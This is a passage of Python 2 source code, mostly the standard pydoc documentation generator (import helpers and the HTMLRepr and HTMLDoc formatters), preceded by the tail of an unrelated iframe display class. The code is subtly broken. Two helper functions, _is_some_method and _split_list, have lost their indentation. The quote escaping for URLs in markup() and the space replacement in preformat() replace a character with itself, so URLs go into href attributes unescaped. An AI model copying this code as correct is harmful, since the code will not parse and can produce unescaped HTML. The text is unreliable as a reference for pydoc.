        self.height = HEIGHT
        return self
    def display_in_browser(self,content_type,data={},new_tab=False,autoraise=False):
        # Convenience wrapper: display and also open a browser window/tab.
        self.display(content_type,data,open_browser=True,new_tab=new_tab,autoraise=autoraise)
        return None
    def _repr_html_(self):
        # This method is for ipython notebook integration through Rich Display
        return '<iframe src=%s width=%s height=%s frameborder=0></iframe>'%(self.url,self.width,self.height)
|
pydoc.py | #!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision$"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
    from collections import deque
except ImportError:
    # Python 2.3 compatibility: minimal stand-in supporting only the
    # popleft() operation this module uses.
    class deque(list):
        def popleft(self):
            return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
    """Convert sys.path into a list of absolute, existing, unique paths."""
    result = []
    seen = []
    for entry in sys.path:
        absdir = os.path.abspath(entry or '.')
        # normcase collapses case-insensitive duplicates (e.g. on Windows)
        key = os.path.normcase(absdir)
        if key not in seen and os.path.isdir(absdir):
            result.append(absdir)
            seen.append(key)
    return result
def getdoc(object):
    """Get the doc string or comments for an object."""
    text = inspect.getdoc(object) or inspect.getcomments(object)
    if not text:
        return ''
    # strip leading blank lines left over after dedenting
    return re.sub('^ *\n', '', rstrip(text)) or ''
def splitdoc(doc):
    """Split a doc string into a synopsis line (if any) and the rest."""
    lines = split(strip(doc), '\n')
    # a single line is all synopsis
    if len(lines) == 1:
        return lines[0], ''
    # first line followed by a blank line: synopsis + body
    if len(lines) >= 2 and not rstrip(lines[1]):
        return lines[0], join(lines[2:], '\n')
    # no blank separator: treat the whole string as body
    return '', join(lines, '\n')
def classname(object, modname):
    """Get a class name and qualify it with a module name if necessary."""
    qualified = object.__name__
    # qualify only when the class comes from a different module
    if object.__module__ != modname:
        qualified = '%s.%s' % (object.__module__, qualified)
    return qualified
def isdata(object):
    """Check if an object is of a type that probably means it's data."""
    non_data_checks = (inspect.ismodule, inspect.isclass, inspect.isroutine,
                       inspect.isframe, inspect.istraceback, inspect.iscode)
    return not any(check(object) for check in non_data_checks)
def replace(text, *pairs):
    """Do a series of global replacements on a string.

    *pairs* is a flat sequence: (old1, new1, old2, new2, ...).
    """
    for i in range(0, len(pairs), 2):
        text = join(split(text, pairs[i]), pairs[i + 1])
    return text
def cram(text, maxlen):
    """Omit part of a string if needed to make it fit in a maximum length."""
    if len(text) <= maxlen:
        return text
    # keep roughly equal slices from each end, minus room for '...'
    pre = max(0, (maxlen - 3) // 2)
    post = max(0, maxlen - 3 - pre)
    return text[:pre] + '...' + text[len(text) - post:]
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)

def stripid(text):
    """Remove the hexadecimal id from a Python object representation."""
    # The behaviour of %p is implementation-dependent in terms of case;
    # probe repr(Exception) once to check whether ids appear at all.
    if _re_stripid.search(repr(Exception)) is None:
        return text
    return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
    """Return {name: attribute} for every method visible on class *cl*,
    including those inherited from its base classes."""
    found = {}
    for name, _value in inspect.getmembers(cl, _is_some_method):
        found[name] = 1
    for base in cl.__bases__:
        found.update(allmethods(base))  # all your base are belong to us
    # resolve each name against *cl* so overrides win over base versions
    for name in found.keys():
        found[name] = getattr(cl, name)
    return found
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
    """Decide whether to show documentation on a variable."""
    # Certain special names are redundant.
    redundant = ('__builtins__', '__doc__', '__file__', '__path__',
                 '__module__', '__name__', '__slots__', '__package__')
    if name in redundant:
        return 0
    # Private names are hidden, but special (dunder) names are displayed.
    if name.startswith('__') and name.endswith('__'):
        return 1
    if all is not None:
        # only document that which the programmer exported in __all__
        return name in all
    return not name.startswith('_')
def classify_class_attrs(object):
    """Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
    def relabel(entry):
        name, kind, cls, value = entry
        # properties and other data descriptors get a dedicated label
        if inspect.isdatadescriptor(value):
            kind = 'data descriptor'
        return name, kind, cls, value
    return map(relabel, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
    """Guess whether a path refers to a package directory."""
    if not os.path.isdir(path):
        return False
    # a directory is a package if it carries any form of __init__ module
    return any(os.path.isfile(os.path.join(path, '__init__' + ext))
               for ext in ('.py', '.pyc', '.pyo'))
def source_synopsis(file):
    # Extract the first line of the module docstring from an already-open
    # source *file*; returns None when the file does not begin with a
    # triple-double-quoted docstring.
    line = file.readline()
    # skip leading comment lines and blank lines
    while line[:1] == '#' or not strip(line):
        line = file.readline()
        if not line: break
    line = strip(line)
    # treat a raw docstring (r""") like a plain one
    if line[:4] == 'r"""': line = line[1:]
    if line[:3] == '"""':
        line = line[3:]
        # a trailing backslash continues the line
        if line[-1:] == '\\': line = line[:-1]
        # the synopsis may be preceded by blank lines inside the docstring
        while not strip(line):
            line = file.readline()
            if not line: break
        result = strip(split(line, '"""')[0])
    else: result = None
    return result
def synopsis(filename, cache={}):
    """Get the one-line summary out of a module file.

    Results are memoized in `cache` (keyed by filename, stamped with the
    file's mtime) so repeated index builds don't re-read every module.
    Returns None if the file can't be opened or imported.
    """
    mtime = os.stat(filename).st_mtime
    lastupdate, result = cache.get(filename, (0, None))
    if lastupdate < mtime:
        info = inspect.getmoduleinfo(filename)
        try:
            file = open(filename)
        except IOError:
            # module can't be opened, so skip it
            return None
        try:
            if info and 'b' in info[2]: # binary modules have to be imported
                try:
                    module = imp.load_module('__temp__', file, filename, info[1:])
                except:
                    # Import failed; the finally below still closes the
                    # file (the original leaked it on this path).
                    return None
                doc = module.__doc__ or ''
                # ''.splitlines() is [], so guard against a missing
                # docstring instead of raising IndexError.
                result = doc.splitlines()[0] if doc else ''
                del sys.modules['__temp__']
            else: # text modules can be directly examined
                result = source_synopsis(file)
        finally:
            file.close()
        cache[filename] = (mtime, result)
    return result
class ErrorDuringImport(Exception):
    """Errors that occurred while trying to import something to document it."""
    def __init__(self, filename, exc_info):
        self.filename = filename
        # Unpack the (type, value, traceback) triple from sys.exc_info().
        self.exc, self.value, self.tb = exc_info
    def __str__(self):
        exc = self.exc
        # Old-style exception classes are shown by their bare name.
        if type(exc) is types.ClassType:
            exc = exc.__name__
        return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
    """Import a Python source file or compiled file given its path.

    Raises ErrorDuringImport (wrapping the original exception) if the
    file is found but executing it fails.
    """
    magic = imp.get_magic()
    # Peek at the header to decide whether this is a compiled file.
    file = open(path, 'r')
    try:
        if file.read(len(magic)) == magic:
            kind = imp.PY_COMPILED
        else:
            kind = imp.PY_SOURCE
    finally:
        file.close()
    filename = os.path.basename(path)
    name, ext = os.path.splitext(filename)
    file = open(path, 'r')
    # try/finally guarantees the handle is closed even when load_module
    # raises (the original leaked it on the error path).
    try:
        try:
            module = imp.load_module(name, file, path, (ext, 'r', kind))
        except:
            raise ErrorDuringImport(path, sys.exc_info())
    finally:
        file.close()
    return module
def safeimport(path, forceload=0, cache={}):
    """Import a module; handle errors; return None if the module isn't found.
    If the module *is* found but an exception occurs, it's wrapped in an
    ErrorDuringImport exception and reraised. Unlike __import__, if a
    package path is specified, the module at the end of the path is returned,
    not the package at the beginning. If the optional 'forceload' argument
    is 1, we reload the module from disk (unless it's a dynamic extension)."""
    try:
        # If forceload is 1 and the module has been previously loaded from
        # disk, we always have to reload the module. Checking the file's
        # mtime isn't good enough (e.g. the module could contain a class
        # that inherits from another module that has changed).
        if forceload and path in sys.modules:
            if path not in sys.builtin_module_names:
                # Avoid simply calling reload() because it leaves names in
                # the currently loaded module lying around if they're not
                # defined in the new source file. Instead, remove the
                # module from sys.modules and re-import. Also remove any
                # submodules because they won't appear in the newly loaded
                # module's namespace if they're already in sys.modules.
                subs = [m for m in sys.modules if m.startswith(path + '.')]
                for key in [path] + subs:
                    # Prevent garbage collection.
                    cache[key] = sys.modules[key]
                    del sys.modules[key]
        module = __import__(path)
    except:
        # Did the error occur before or after the module was found?
        (exc, value, tb) = info = sys.exc_info()
        if path in sys.modules:
            # An error occurred while executing the imported module.
            raise ErrorDuringImport(sys.modules[path].__file__, info)
        elif exc is SyntaxError:
            # A SyntaxError occurred before we could execute the module.
            raise ErrorDuringImport(value.filename, info)
        elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
            # The import error occurred directly in this function,
            # which means there is no such module in the path.
            return None
        else:
            # Some other error occurred during the importing process.
            raise ErrorDuringImport(path, sys.exc_info())
    # __import__ returns the top-level package; walk the remaining dotted
    # components down to the leaf module requested by the caller.
    for part in split(path, '.')[1:]:
        try: module = getattr(module, part)
        except AttributeError: return None
    return module
# ---------------------------------------------------- formatter base class
class Doc:
    """Base class for documentation formatters.

    Subclasses (e.g. HTMLDoc, TextDoc) override the doc* methods;
    document() dispatches to the right one for the object's type.
    """
    def document(self, object, name=None, *args):
        """Generate documentation for an object."""
        args = (object, name) + args
        # 'try' clause is to attempt to handle the possibility that inspect
        # identifies something in a way that pydoc itself has issues handling;
        # think 'super' and how it is a descriptor (which raises the exception
        # by lacking a __name__ attribute) and an instance.
        if inspect.isgetsetdescriptor(object): return self.docdata(*args)
        if inspect.ismemberdescriptor(object): return self.docdata(*args)
        try:
            if inspect.ismodule(object): return self.docmodule(*args)
            if inspect.isclass(object): return self.docclass(*args)
            if inspect.isroutine(object): return self.docroutine(*args)
        except AttributeError:
            pass
        if isinstance(object, property): return self.docproperty(*args)
        return self.docother(*args)
    def fail(self, object, name=None, *args):
        """Raise an exception for unimplemented types."""
        # "or ''" guards the anonymous case: without it, name=None made
        # the message read "document objectNone of type ...".
        message = "don't know how to document object%s of type %s" % (
            name and ' ' + repr(name) or '', type(object).__name__)
        raise TypeError(message)
    docmodule = docclass = docroutine = docother = docproperty = docdata = fail
    def getdocloc(self, object):
        """Return the location of module docs or None"""
        try:
            file = inspect.getabsfile(object)
        except TypeError:
            file = '(built-in)'
        docloc = os.environ.get("PYTHONDOCS",
                                "http://docs.python.org/library")
        basedir = os.path.join(sys.exec_prefix, "lib",
                               "python"+sys.version[0:3])
        # Only core modules get an online-docs link: either a known
        # built-in name, or a file under the stdlib directory that is
        # not in site-packages.
        if (isinstance(object, type(os)) and
            (object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
                                 'marshal', 'posix', 'signal', 'sys',
                                 'thread', 'zipimport') or
             (file.startswith(basedir) and
              not file.startswith(os.path.join(basedir, 'site-packages'))))):
            if docloc.startswith("http://"):
                docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
            else:
                docloc = os.path.join(docloc, object.__name__ + ".html")
        else:
            docloc = None
        return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
    """Class for safely making an HTML representation of a Python object."""
    def __init__(self):
        Repr.__init__(self)
        self.maxlist = self.maxtuple = 20
        self.maxdict = 10
        self.maxstring = self.maxother = 100
    def escape(self, text):
        """Escape the HTML-special characters in text."""
        # '&' must be replaced first so the entities produced for '<'
        # and '>' are not themselves re-escaped.  (The previous version
        # mapped each character to itself — a no-op that emitted raw,
        # unescaped HTML.)
        return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
    def repr(self, object):
        return Repr.repr(self, object)
    def repr1(self, x, level):
        # Dispatch to a type-specific repr_* method when one exists.
        if hasattr(type(x), '__name__'):
            methodname = 'repr_' + join(split(type(x).__name__), '_')
            if hasattr(self, methodname):
                return getattr(self, methodname)(x, level)
        return self.escape(cram(stripid(repr(x)), self.maxother))
    def repr_string(self, x, level):
        test = cram(x, self.maxstring)
        testrepr = repr(test)
        if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
            # Backslashes are only literal in the string and are never
            # needed to make any special characters, so show a raw string.
            return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
        return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
                      r'<font color="#c040c0">\1</font>',
                      self.escape(testrepr))
    repr_str = repr_string
    def repr_instance(self, x, level):
        try:
            return self.escape(cram(stripid(repr(x)), self.maxstring))
        except:
            return self.escape('<%s instance>' % x.__class__.__name__)
    repr_unicode = repr_string
class HTMLDoc(Doc):
    """Formatter class for HTML documentation."""
    # ------------------------------------------- HTML formatting utilities
    # Shared helper instance; repr/escape are exposed as unbound helpers so
    # they can be called like plain functions on this class.
    _repr_instance = HTMLRepr()
    repr = _repr_instance.repr
    escape = _repr_instance.escape
    def page(self, title, contents):
        """Format an HTML page."""
        return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
    def heading(self, title, fgcol, bgcol, extras=''):
        """Format a page heading."""
        return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
    ''' % (bgcol, fgcol, title, fgcol, extras or ' ')
    def section(self, title, fgcol, bgcol, contents, width=6,
                prelude='', marginalia=None, gap=' '):
        """Format a section with a heading."""
        if marginalia is None:
            marginalia = '<tt>' + ' ' * width + '</tt>'
        result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
    ''' % (bgcol, fgcol, title)
        if prelude:
            result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
        else:
            result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
        return result + '\n<td width="100%%">%s</td></tr></table>' % contents
    def bigsection(self, title, *args):
        """Format a section with a big heading."""
        title = '<big><strong>%s</strong></big>' % title
        return self.section(title, *args)
    def preformat(self, text):
        """Format literal preformatted text."""
        text = self.escape(expandtabs(text))
        return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
                       ' ', ' ', '\n', '<br>\n')
    def multicolumn(self, list, format, cols=4):
        """Format a list of items into a multi-column list."""
        result = ''
        # NOTE: integer division under Python 2; rows is the per-column height.
        rows = (len(list)+cols-1)/cols
        for col in range(cols):
            result = result + '<td width="%d%%" valign=top>' % (100/cols)
            for i in range(rows*col, rows*col+rows):
                if i < len(list):
                    result = result + format(list[i]) + '<br>\n'
            result = result + '</td>'
        return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
    def grey(self, text): return '<font color="#909090">%s</font>' % text
    def namelink(self, name, *dicts):
        """Make a link for an identifier, given name-to-URL mappings."""
        # The first mapping that knows the name wins.
        for dict in dicts:
            if name in dict:
                return '<a href="%s">%s</a>' % (dict[name], name)
        return name
    def classlink(self, object, modname):
        """Make a link for a class."""
        name, module = object.__name__, sys.modules.get(object.__module__)
        # Only link when the class is reachable under its own name in its
        # defining module; otherwise just render the (unlinked) name.
        if hasattr(module, name) and getattr(module, name) is object:
            return '<a href="%s.html#%s">%s</a>' % (
                module.__name__, name, classname(object, modname))
        return classname(object, modname)
    def modulelink(self, object):
        """Make a link for a module."""
        return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
    def modpkglink(self, data):
        """Make a link for a module or package to display in an index."""
        name, path, ispackage, shadowed = data
        if shadowed:
            # Shadowed modules are greyed out and not linked.
            return self.grey(name)
        if path:
            url = '%s.%s.html' % (path, name)
        else:
            url = '%s.html' % name
        if ispackage:
            text = '<strong>%s</strong> (package)' % name
        else:
            text = name
        return '<a href="%s">%s</a>' % (url, text)
    def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
        """Mark up some plain text, given a context of symbols to look for.
        Each context dictionary maps object names to anchor names."""
        escape = escape or self.escape
        results = []
        here = 0
        # Recognize, in order: URLs, RFC and PEP references, self.name
        # attribute references, and bare identifiers.
        pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
                                r'RFC[- ]?(\d+)|'
                                r'PEP[- ]?(\d+)|'
                                r'(self\.)?(\w+))')
        while True:
            match = pattern.search(text, here)
            if not match: break
            start, end = match.span()
            # Text between matches is passed through (escaped) untouched.
            results.append(escape(text[here:start]))
            all, scheme, rfc, pep, selfdot, name = match.groups()
            if scheme:
                url = escape(all).replace('"', '"')
                results.append('<a href="%s">%s</a>' % (url, url))
            elif rfc:
                url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
                results.append('<a href="%s">%s</a>' % (url, escape(all)))
            elif pep:
                url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
                results.append('<a href="%s">%s</a>' % (url, escape(all)))
            elif text[end:end+1] == '(':
                # An identifier followed by '(' looks like a call:
                # prefer methods, then functions, then classes.
                results.append(self.namelink(name, methods, funcs, classes))
            elif selfdot:
                results.append('self.<strong>%s</strong>' % name)
            else:
                results.append(self.namelink(name, classes))
            here = end
        results.append(escape(text[here:]))
        return join(results, '')
    # ---------------------------------------------- type-specific routines
    def formattree(self, tree, modname, parent=None):
        """Produce HTML for a class tree as given by inspect.getclasstree()."""
        result = ''
        for entry in tree:
            if type(entry) is type(()):
                # (class, bases) tuple: render the class and its base list.
                c, bases = entry
                result = result + '<dt><font face="helvetica, arial">'
                result = result + self.classlink(c, modname)
                if bases and bases != (parent,):
                    parents = []
                    for base in bases:
                        parents.append(self.classlink(base, modname))
                    result = result + '(' + join(parents, ', ') + ')'
                result = result + '\n</font></dt>'
            elif type(entry) is type([]):
                # A list entry holds the subclasses of 'c' from the
                # preceding tuple entry.
                result = result + '<dd>\n%s</dd>\n' % self.formattree(
                    entry, modname, c)
        return '<dl>\n%s</dl>\n' % result
    def docmodule(self, object, name=None, mod=None, *ignored):
        """Produce HTML documentation for a module object."""
        name = object.__name__ # ignore the passed-in name
        try:
            all = object.__all__
        except AttributeError:
            all = None
        # Build a breadcrumb-style linked name for dotted module paths.
        parts = split(name, '.')
        links = []
        for i in range(len(parts)-1):
            links.append(
                '<a href="%s.html"><font color="#ffffff">%s</font></a>' %
                (join(parts[:i+1], '.'), parts[i]))
        linkedname = join(links + parts[-1:], '.')
        head = '<big><big><strong>%s</strong></big></big>' % linkedname
        try:
            path = inspect.getabsfile(object)
            url = path
            if sys.platform == 'win32':
                import nturl2path
                url = nturl2path.pathname2url(path)
            filelink = '<a href="file:%s">%s</a>' % (url, path)
        except TypeError:
            filelink = '(built-in)'
        info = []
        if hasattr(object, '__version__'):
            version = str(object.__version__)
            # Strip CVS "$Revision: ... $" decoration if present.
            if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
                version = strip(version[11:-1])
            info.append('version %s' % self.escape(version))
        if hasattr(object, '__date__'):
            info.append(self.escape(str(object.__date__)))
        if info:
            head = head + ' (%s)' % join(info, ', ')
        docloc = self.getdocloc(object)
        if docloc is not None:
            docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
        else:
            docloc = ''
        result = self.heading(
            head, '#ffffff', '#7799ee',
            '<a href=".">index</a><br>' + filelink + docloc)
        modules = inspect.getmembers(object, inspect.ismodule)
        # Collect documented classes and an anchor dictionary (cdict) that
        # markup() uses to linkify class names.
        classes, cdict = [], {}
        for key, value in inspect.getmembers(object, inspect.isclass):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                (inspect.getmodule(value) or object) is object):
                if visiblename(key, all):
                    classes.append((key, value))
                    cdict[key] = cdict[value] = '#' + key
        # Base classes defined elsewhere get cross-module anchors.
        for key, value in classes:
            for base in value.__bases__:
                key, modname = base.__name__, base.__module__
                module = sys.modules.get(modname)
                if modname != name and module and hasattr(module, key):
                    if getattr(module, key) is base:
                        if not key in cdict:
                            cdict[key] = cdict[base] = modname + '.html#' + key
        funcs, fdict = [], {}
        for key, value in inspect.getmembers(object, inspect.isroutine):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                inspect.isbuiltin(value) or inspect.getmodule(value) is object):
                if visiblename(key, all):
                    funcs.append((key, value))
                    fdict[key] = '#-' + key
                    if inspect.isfunction(value): fdict[value] = fdict[key]
        data = []
        for key, value in inspect.getmembers(object, isdata):
            if visiblename(key, all):
                data.append((key, value))
        doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
        doc = doc and '<tt>%s</tt>' % doc
        result = result + '<p>%s</p>\n' % doc
        if hasattr(object, '__path__'):
            # Packages list their contents instead of imported modules.
            modpkgs = []
            for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
                modpkgs.append((modname, name, ispkg, 0))
            modpkgs.sort()
            contents = self.multicolumn(modpkgs, self.modpkglink)
            result = result + self.bigsection(
                'Package Contents', '#ffffff', '#aa55cc', contents)
        elif modules:
            contents = self.multicolumn(
                modules, lambda key_value, s=self: s.modulelink(key_value[1]))
            result = result + self.bigsection(
                'Modules', '#ffffff', '#aa55cc', contents)
        if classes:
            classlist = map(lambda key_value: key_value[1], classes)
            contents = [
                self.formattree(inspect.getclasstree(classlist, 1), name)]
            for key, value in classes:
                contents.append(self.document(value, key, name, fdict, cdict))
            result = result + self.bigsection(
                'Classes', '#ffffff', '#ee77aa', join(contents))
        if funcs:
            contents = []
            for key, value in funcs:
                contents.append(self.document(value, key, name, fdict, cdict))
            result = result + self.bigsection(
                'Functions', '#ffffff', '#eeaa77', join(contents))
        if data:
            contents = []
            for key, value in data:
                contents.append(self.document(value, key))
            result = result + self.bigsection(
                'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
        if hasattr(object, '__author__'):
            contents = self.markup(str(object.__author__), self.preformat)
            result = result + self.bigsection(
                'Author', '#ffffff', '#7799ee', contents)
        if hasattr(object, '__credits__'):
            contents = self.markup(str(object.__credits__), self.preformat)
            result = result + self.bigsection(
                'Credits', '#ffffff', '#7799ee', contents)
        return result
    def docclass(self, object, name=None, mod=None, funcs={}, classes={},
                 *ignored):
        """Produce HTML documentation for a class object."""
        realname = object.__name__
        name = name or realname
        bases = object.__bases__
        contents = []
        push = contents.append
        # Cute little class to pump out a horizontal rule between sections.
        class HorizontalRule:
            def __init__(self):
                self.needone = 0
            def maybe(self):
                if self.needone:
                    push('<hr>\n')
                self.needone = 1
        hr = HorizontalRule()
        # List the mro, if non-trivial.
        mro = deque(inspect.getmro(object))
        if len(mro) > 2:
            hr.maybe()
            push('<dl><dt>Method resolution order:</dt>\n')
            for base in mro:
                push('<dd>%s</dd>\n' % self.classlink(base,
                                                      object.__module__))
            push('</dl>\n')
        # The three spill* helpers pull the attributes matching 'predicate'
        # out of 'attrs', render them under the heading 'msg', and return
        # the attributes that did not match.
        def spill(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self.document(getattr(object, name), name, mod,
                                       funcs, classes, mdict, object))
                    push('\n')
            return attrs
        def spilldescriptors(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self._docdescriptor(name, value, mod))
            return attrs
        def spilldata(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    base = self.docother(getattr(object, name), name, mod)
                    if (hasattr(value, '__call__') or
                            inspect.isdatadescriptor(value)):
                        doc = getattr(value, "__doc__", None)
                    else:
                        doc = None
                    if doc is None:
                        push('<dl><dt>%s</dl>\n' % base)
                    else:
                        doc = self.markup(getdoc(value), self.preformat,
                                          funcs, classes, mdict)
                        doc = '<dd><tt>%s</tt>' % doc
                        push('<dl><dt>%s%s</dl>\n' % (base, doc))
                    push('\n')
            return attrs
        attrs = filter(lambda data: visiblename(data[0]),
                       classify_class_attrs(object))
        # mdict maps attribute names (and, where hashable, their values)
        # to page anchors so markup() can linkify references to them.
        mdict = {}
        for key, kind, homecls, value in attrs:
            mdict[key] = anchor = '#' + name + '-' + key
            value = getattr(object, key)
            try:
                # The value may not be hashable (e.g., a data attr with
                # a dict or list value).
                mdict[value] = anchor
            except TypeError:
                pass
        # Walk the mro, emitting each class's attributes in kind order.
        while attrs:
            if mro:
                thisclass = mro.popleft()
            else:
                thisclass = attrs[0][2]
            attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
            if thisclass is __builtin__.object:
                attrs = inherited
                continue
            elif thisclass is object:
                tag = 'defined here'
            else:
                tag = 'inherited from %s' % self.classlink(thisclass,
                                                           object.__module__)
            tag += ':<br>\n'
            # Sort attrs by name.
            try:
                attrs.sort(key=lambda t: t[0])
            except TypeError:
                attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
            # Pump out the attrs, segregated by kind.
            attrs = spill('Methods %s' % tag, attrs,
                          lambda t: t[1] == 'method')
            attrs = spill('Class methods %s' % tag, attrs,
                          lambda t: t[1] == 'class method')
            attrs = spill('Static methods %s' % tag, attrs,
                          lambda t: t[1] == 'static method')
            attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
                                     lambda t: t[1] == 'data descriptor')
            attrs = spilldata('Data and other attributes %s' % tag, attrs,
                              lambda t: t[1] == 'data')
            assert attrs == []
            attrs = inherited
        contents = ''.join(contents)
        if name == realname:
            title = '<a name="%s">class <strong>%s</strong></a>' % (
                name, realname)
        else:
            title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
                name, name, realname)
        if bases:
            parents = []
            for base in bases:
                parents.append(self.classlink(base, object.__module__))
            title = title + '(%s)' % join(parents, ', ')
        doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
        doc = doc and '<tt>%s<br> </tt>' % doc
        return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
    def formatvalue(self, object):
        """Format an argument default value as text."""
        return self.grey('=' + self.repr(object))
    def docroutine(self, object, name=None, mod=None,
                   funcs={}, classes={}, methods={}, cl=None):
        """Produce HTML documentation for a function or method object."""
        realname = object.__name__
        name = name or realname
        anchor = (cl and cl.__name__ or '') + '-' + name
        note = ''
        skipdocs = 0
        if inspect.ismethod(object):
            imclass = object.im_class
            if cl:
                if imclass is not cl:
                    note = ' from ' + self.classlink(imclass, mod)
            else:
                if object.im_self is not None:
                    note = ' method of %s instance' % self.classlink(
                        object.im_self.__class__, mod)
                else:
                    note = ' unbound %s method' % self.classlink(imclass,mod)
            # Document the underlying function of the (un)bound method.
            object = object.im_func
        if name == realname:
            title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
        else:
            if (cl and realname in cl.__dict__ and
                cl.__dict__[realname] is object):
                # An alias for a method documented elsewhere in this class:
                # link to it instead of repeating the docs.
                reallink = '<a href="#%s">%s</a>' % (
                    cl.__name__ + '-' + realname, realname)
                skipdocs = 1
            else:
                reallink = realname
            title = '<a name="%s"><strong>%s</strong></a> = %s' % (
                anchor, name, reallink)
        if inspect.isfunction(object):
            args, varargs, varkw, defaults = inspect.getargspec(object)
            argspec = inspect.formatargspec(
                args, varargs, varkw, defaults, formatvalue=self.formatvalue)
            if realname == '<lambda>':
                title = '<strong>%s</strong> <em>lambda</em> ' % name
                argspec = argspec[1:-1] # remove parentheses
        else:
            argspec = '(...)'
        decl = title + argspec + (note and self.grey(
               '<font face="helvetica, arial">%s</font>' % note))
        if skipdocs:
            return '<dl><dt>%s</dt></dl>\n' % decl
        else:
            doc = self.markup(
                getdoc(object), self.preformat, funcs, classes, methods)
            doc = doc and '<dd><tt>%s</tt></dd>' % doc
            return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
    def _docdescriptor(self, name, value, mod):
        """Render a descriptor as a bolded name plus its docstring."""
        results = []
        push = results.append
        if name:
            push('<dl><dt><strong>%s</strong></dt>\n' % name)
        if value.__doc__ is not None:
            doc = self.markup(getdoc(value), self.preformat)
            push('<dd><tt>%s</tt></dd>\n' % doc)
        push('</dl>\n')
        return ''.join(results)
